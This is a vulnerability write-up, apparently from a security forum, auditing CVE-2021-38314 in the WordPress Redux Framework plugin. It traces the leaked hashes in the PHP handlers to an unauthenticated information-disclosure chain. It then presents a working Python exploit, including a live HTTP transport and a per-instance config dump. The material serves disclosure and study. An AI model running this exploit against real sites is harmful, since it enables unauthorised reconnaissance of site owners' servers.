WordPress sensitive information disclosure CVE-2021-38314: code audit

Vulnerability analysis

WordPress Redux Framework class-redux-helpers.php sensitive information disclosure, CVE-2021-38314 | code audit and reproduction
==================================================================================

Vulnerability description
----

In August 2021 an unauthenticated sensitive-information disclosure in Redux Framework was published as CVE-2021-38314. It affects v4.2.11 and below: a specially crafted request lets an unauthenticated client retrieve sensitive information about the server environment.

Affected versions
----

Redux Framework <= v4.2.11

Plugin
---

Redux Framework <https://github.com/reduxframework/redux-framework>

Reproduction
----

Affected versions are v4.2.11 and below, so start by diffing the vulnerable release against the fixed one:

![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-c0e83cbfcacce79ae68a52f280eda9091565682f.png)

The fix simply deletes the handlers registered with `add_action`. Installing the vulnerable version locally and reading the registration code:

![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-2b6df32d2b1ee4b9836fdd55209af6718db2aa9b.png)

```php
$support_hash = md5( md5( Redux_Functions_Ex::hash_key() . '-redux' ) . '-support' );
add_action( 'wp_ajax_nopriv_' . $support_hash, array( 'Redux_Helpers', 'support_args' ) );
add_action( 'wp_ajax_' . $support_hash, array( 'Redux_Helpers', 'support_args' ) );

$hash_arg = md5( trailingslashit( network_site_url() ) . '-redux' );
add_action( 'wp_ajax_nopriv_' . $hash_arg, array( 'Redux_Helpers', 'hash_arg' ) );
add_action( 'wp_ajax_' . $hash_arg, array( 'Redux_Helpers', 'hash_arg' ) );

add_action( 'wp_ajax_redux_support_hash', array( 'Redux_Functions', 'support_hash' ) );
add_filter( 'redux/tracking/options', array( 'Redux_Helpers', 'redux_stats_additions' ) );
```

Now look at the two handlers that `add_action` registers, `hash_arg()` and `support_args()`:

```php
public static function hash_arg() {
    echo esc_html( md5( Redux_Functions_Ex::hash_key() . '-redux' ) );
    die();
}
```

```php
public static function support_args() {
    header( 'Expires: Mon, 26 Jul 1997 05:00:00 GMT' );
    header( 'Last-Modified: ' . gmdate( 'D, d M Y H:i:s' ) . 'GMT' );
    header( 'Expires: Sat, 26 Jul 1997 05:00:00 GMT' );
    header( 'Cache-Control: no-store, no-cache, must-revalidate' );
    header( 'Cache-Control: post-check=0, pre-check=0', false );
    header( 'Pragma: no-cache' );

    $instances = Redux::all_instances();

    if ( isset( $_REQUEST['i'] ) && ! empty( $_REQUEST['i'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification
        if ( is_array( $instances ) && ! empty( $instances ) ) {
            foreach ( $instances as $opt_name => $data ) {
                if ( md5( $opt_name . '-debug' ) === $_REQUEST['i'] ) { // phpcs:ignore WordPress.Security.NonceVerification
                    $array = $data;
                }
            }
        }

        if ( isset( $array ) ) {
            // We only want the extension names and versions.
            $array->extensions = self::get_extensions( $opt_name );

            $to_return = array();

            // Filter out all the unwanted data.
            foreach ( $array as $key => $value ) {
                if ( in_array(
                    $key,
                    array(
                        // 'fields',
                        'extensions',
                        'sections',
                        'args',
                        // 'field_types'
                    ),
                    true
                ) ) {
                    $to_return[ $key ] = $value;
                } else {
                    // phpcs:ignore Generic.CodeAnalysis.EmptyStatement
                    // phpcs:ignore Squiz.PHP.CommentedOutCode
                    /* echo $key.PHP_EOL; */
                }
            }
            $array = $to_return;
        } else {
            die();
        }
    } else {
        $array = self::get_statistics_object();

        if ( is_array( $instances ) && ! empty( $instances ) ) {
            $array['instances'] = array();

            foreach ( $instances as $opt_name => $data ) {
                $array['instances'][] = $opt_name;
            }
        }

        $array['key'] = md5( Redux_Functions_Ex::hash_key() );
    }

    ksort( $array ); // Let's make that pretty.

    // phpcs:ignored WordPress.PHP.NoSilencedErrors, WordPress.Security.EscapeOutput
    echo @htmlspecialchars( @wp_json_encode( $array, true ), ENT_QUOTES );
    die();
}
```

In `support_args()`, when `$_REQUEST['i']` is empty, execution falls into the other branch:

```php
} else {
    $array = self::get_statistics_object();

    if ( is_array( $instances ) && ! empty( $instances ) ) {
        $array['instances'] = array();

        foreach ( $instances as $opt_name => $data ) {
            $array['instances'][] = $opt_name;
        }
    }

    $array['key'] = md5( Redux_Functions_Ex::hash_key() );
}
```

Following `get_statistics_object()`: it collects environment information such as the installed plugins and their versions, and that whole object is what the handler echoes back (after `wp_json_encode()` and `htmlspecialchars()`, so the response is JSON with HTML-escaped quotes). Note that only `md5( hash_key() )` is included as `key`; the secret itself is not echoed.

![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-b82a54be4a24c84dc982ff13b8c3d13991425d46.png)

Looking back at the registration, `support_args()` is hooked under `wp_ajax_nopriv_*`, so it can be reached without authentication:

![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-b32945e773400971efaae18f8fc0c8f7afaaa023.png)

The only thing missing is the value of `$support_hash`, so follow `hash_key()`:

```php
$support_hash = md5( md5( Redux_Functions_Ex::hash_key() . '-redux' ) . '-support' );
```

![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-358db193767b7fd663a0b09caa9f5589d6fb8bc6.png)

`hash_key()` is derived from `AUTH_KEY` in wp-config.php, which is a random per-site value, so an attacker cannot compute `$support_hash` directly:

![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-caf89777a57c971be3b8fd15dcc76288821a1c57.png)

Now go back to `hash_arg()`:

![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-cc42f4b8bca2b56e4af44e80377ca241224da233.png)

```php
public static function hash_arg() {
    echo esc_html( md5( Redux_Functions_Ex::hash_key() . '-redux' ) );
    die();
}
```

This handler calls `Redux_Functions_Ex::hash_key()` and echoes `md5( hash_key() . '-redux' )`. Comparing with the registration code, that is exactly the inner hash from which `$support_hash` is built, so the equivalent substitution is (pseudocode; `hash_arg()` echoes its value rather than returning it):

```php
$support_hash = md5( hash_arg() . '-support' );
```

And `hash_arg()` itself is registered, also under `wp_ajax_nopriv_*`, with the action name `md5( trailingslashit( network_site_url() ) . '-redux' )`, which depends only on the public site URL.

![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-7b1f94c101500a779ce57a9761a0106fbdc95e52.png)

That gives a complete unauthenticated chain:

```php
// Step 1: the action name depends only on the site URL ...
$hash_arg = md5( trailingslashit( network_site_url() ) . '-redux' );
add_action( 'wp_ajax_nopriv_' . $hash_arg, array( 'Redux_Helpers', 'hash_arg' ) );
// ... and the response is md5( Redux_Functions_Ex::hash_key() . '-redux' )

// Step 2: hash that response with '-support' to get the second action name ...
$support_hash = md5( md5( Redux_Functions_Ex::hash_key() . '-redux' ) . '-support' );
add_action( 'wp_ajax_nopriv_' . $support_hash, array( 'Redux_Helpers', 'support_args' ) );
// ... and call support_args() to obtain the environment information
```

![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-39d9c5d623a42ab0d5b3897a4fd2d78e285d48c7.png)

![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-1abb7eaa3e3a808eaf7f3a0e0f63950c9186b216.png)

![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-bb4c083fd1c2b3252a43d20f993e77ab96d0ebb7.png)

![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-e1f0264bb7c0db89a628bfb70b79fcb49784e67d.png)

Both requests go through `wp-admin/admin-ajax.php?action=<hash>` with no session, and the second response contains plugin versions and other environment information.
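The chain above, as an added example that is not part of the original write-up or of the Redux Framework code base. It reproduces the two unauthenticated requests offline against a simulated `admin-ajax.php` of a Redux <= 4.2.11 site, and also exercises the `$_REQUEST['i']` branch of `support_args()` (the per-instance `args`/`sections`/`extensions` dump that becomes reachable once the `instances` list has leaked), which goes a step beyond what the write-up exploits. Assumptions: the secret behind `Redux_Functions_Ex::hash_key()` is modelled as an opaque string (in real Redux it is derived from `AUTH_KEY`), and the statistics and instance data are constructed samples; `http_fetch()` is a plain urllib transport for a live target, not a Redux API.

```python
"""Offline reproduction of the CVE-2021-38314 request chain (added example)."""
import hashlib
import html
import json
import urllib.parse
import urllib.request
from typing import Callable, Dict, Optional

Fetch = Callable[[str, str], str]   # (action, i) -> response body of admin-ajax.php


def md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def trailingslashit(url: str) -> str:
    """WordPress trailingslashit(): drop trailing '/' or '\\', append one '/'."""
    return url.rstrip("/\\") + "/"


def hash_arg_action(site_url: str) -> str:
    """Action name of hash_arg(): md5( trailingslashit( network_site_url() ) . '-redux' ).
    Anyone who knows the site URL can compute it."""
    return md5(trailingslashit(site_url) + "-redux")


def support_action(hash_arg_response: str) -> str:
    """Action name of support_args(): md5( md5( hash_key() . '-redux' ) . '-support' ).
    hash_arg() hands out the inner md5, so only the outer one is left to compute."""
    return md5(hash_arg_response.strip() + "-support")


def instance_debug_token(opt_name: str) -> str:
    """Value of i= that makes support_args() dump one instance (md5( $opt_name . '-debug' ))."""
    return md5(opt_name + "-debug")


class ReduxSiteSim:
    """Constructed stand-in for admin-ajax.php on a vulnerable site: mirrors the two
    wp_ajax_nopriv_* registrations and both branches of support_args()."""

    def __init__(self, site_url: str, hash_key: str, stats: Dict, instances: Dict[str, Dict]):
        self._hash_key = hash_key                 # server-side secret, never echoed in clear
        self._stats, self._instances = stats, instances
        self._actions = {
            hash_arg_action(site_url): self._hash_arg,
            md5(md5(hash_key + "-redux") + "-support"): self._support_args,
        }

    def _hash_arg(self, i: str) -> str:
        return md5(self._hash_key + "-redux")

    def _support_args(self, i: str) -> str:
        if i:                                      # $_REQUEST['i'] set: per-instance dump
            match = [d for n, d in self._instances.items() if instance_debug_token(n) == i]
            if not match:
                return ""                          # die() without output
            body = {k: v for k, v in match[0].items() if k in ("extensions", "sections", "args")}
        else:                                      # empty 'i': environment statistics
            body = dict(self._stats, instances=list(self._instances), key=md5(self._hash_key))
        # echo @htmlspecialchars( @wp_json_encode( $array, true ), ENT_QUOTES ) after ksort()
        return html.escape(json.dumps(dict(sorted(body.items()))), quote=True)

    def fetch(self, action: str, i: str = "") -> str:
        handler = self._actions.get(action)
        return handler(i) if handler else "0"     # WordPress answers '0' to unknown actions


def http_fetch(site_url: str) -> Fetch:
    """Real transport for a live target (not exercised offline)."""
    endpoint = trailingslashit(site_url) + "wp-admin/admin-ajax.php"

    def fetch(action: str, i: str = "") -> str:
        query = {"action": action, **({"i": i} if i else {})}
        with urllib.request.urlopen(endpoint + "?" + urllib.parse.urlencode(query), timeout=10) as r:
            return r.read().decode("utf-8", "replace")
    return fetch


def _decode(raw: str) -> Optional[Dict]:
    raw = raw.strip()
    if not raw or raw == "0":
        return None
    return json.loads(html.unescape(raw))          # undo htmlspecialchars() before parsing


def leak_support_args(site_url: str, fetch: Fetch) -> Optional[Dict]:
    """Step 1: leak md5( hash_key() . '-redux' ). Step 2: derive the support_args() action
    and pull the statistics object. None if the site does not behave like vulnerable Redux."""
    inner = fetch(hash_arg_action(site_url), "").strip()
    if len(inner) != 32 or any(c not in "0123456789abcdef" for c in inner):
        return None
    return _decode(fetch(support_action(inner), ""))


def leak_instance(site_url: str, fetch: Fetch, opt_name: str) -> Optional[Dict]:
    """Optional step 3: with an opt_name from the leaked 'instances' list, pull that panel's config."""
    inner = fetch(hash_arg_action(site_url), "").strip()
    return _decode(fetch(support_action(inner), instance_debug_token(opt_name)))


SITE = "http://wp.local"   # constructed sample site, secret and data
SIM = ReduxSiteSim(SITE, "0123456789abcdef0123456789abcdef",
                   {"php_version": "7.4.3", "wp_version": "5.8", "plugins": {"redux-framework": "4.2.11"}},
                   {"demo_theme": {"args": {"opt_name": "demo_theme"}, "sections": [], "extensions": {}, "fields": {}}})

if __name__ == "__main__":
    print(json.dumps(leak_support_args(SITE, SIM.fetch), indent=2))
    print(json.dumps(leak_instance(SITE, SIM.fetch, "demo_theme"), indent=2))
```

Against a live site, `leak_support_args("https://example.com", http_fetch("https://example.com"))` performs the same two requests. The first action name must be computed from the value `network_site_url()` actually returns (scheme, host and any installation subdirectory included, `https://www.example.com/blog` versus `http://example.com`), otherwise WordPress answers `0` and the function returns `None`; the same `None` is what a patched site produces, since the fix removes both `add_action` registrations.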
Published 2021-12-03 09:51:54
Category: code audit
Author: PeiQi